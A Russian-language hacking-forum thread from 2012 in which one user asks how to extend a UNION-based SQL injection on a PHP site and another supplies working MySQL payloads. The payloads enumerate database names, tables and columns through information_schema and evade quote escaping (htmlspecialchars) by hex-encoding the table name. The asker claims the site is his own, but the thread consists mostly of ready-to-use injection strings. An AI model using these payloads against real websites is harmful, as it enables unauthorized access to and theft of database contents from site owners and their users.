просмотр таблиц и столбцов
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
просмотр таблиц и столбцов - 2012-04-06 10:50:52.910000
|
|
|
ridlle
Сообщений: 46
Оценки: 0
Присоединился: 2009-06-12 10:43:33.026666
|
есть иньекция ?id=-1+union+select+1,2,version()
как можно узнать имя бд, имена таблиц и полей таблиц.
то есть нужно выполнить вот такой запрос
show databases показать все имена бд
show tables in base_name показать все таблицы
и как посмотреть все столбы в таблицы я не знаю
пробовал вот так ?id=-1+union+show+databases и так ?id=-1+union+select+1,2,show+databases но не катит
|
|
|
|
|
RE: просмотр таблиц и столбцов - 2012-04-06 19:03:49.766666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Смотря какая версия и СУБД. Если мускул и 5-ая версия, то:
1-ая БД:
?id=-1+union+select+1,2,schema_name+from+information_schema.schemata+limit+0,1–+
2-ая БД:
?id=-1+union+select+1,2,schema_name+from+information_schema.schemata+limit+1,1–+
И т.д.
Таблицы:
?id=-1+union+select+1,2,table_name+from+information_schema.tables+limit+0,1–+
Колонки в найденной таблице:
?id=-1+union+select+1,2,column_name+from+information_schema.columns+where+table_name='имя таблицы'+limit+0,1–+
И вообще, почитай FAQ по инъекциям…
|
|
|
|
|
RE: просмотр таблиц и столбцов - 2012-04-06 20:14:30.040000
|
|
|
ridlle
Сообщений: 46
Оценки: 0
Присоединился: 2009-06-12 10:43:33.026666
|
спасибо. только вот поля в таблицы не получается посмотреть. пишу
column_name+from+information_schema.columns+where+table_name='acc'+limit+0,1–+
таблица с таким именем есть. сайт мой и я пришедший параметр сначала пропускаю через ф-цию htmlspecialchars($_GET['id'],ENT_QUOTES)
то есть она заменяет кавычки на мнемоничный код(может неправильное название). есть ли вариант как то по другому это сделать?
|
|
|
|
|
RE: просмотр таблиц и столбцов - 2012-04-06 20:54:30.060000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
…..where+table_name=0xТАБЛИЦА В HEX(без кавычки)+limit+0,1–+
т.е. в твоём случае where+table_name=0x616363+limit+0,1–+
|
|
|
|
|
|
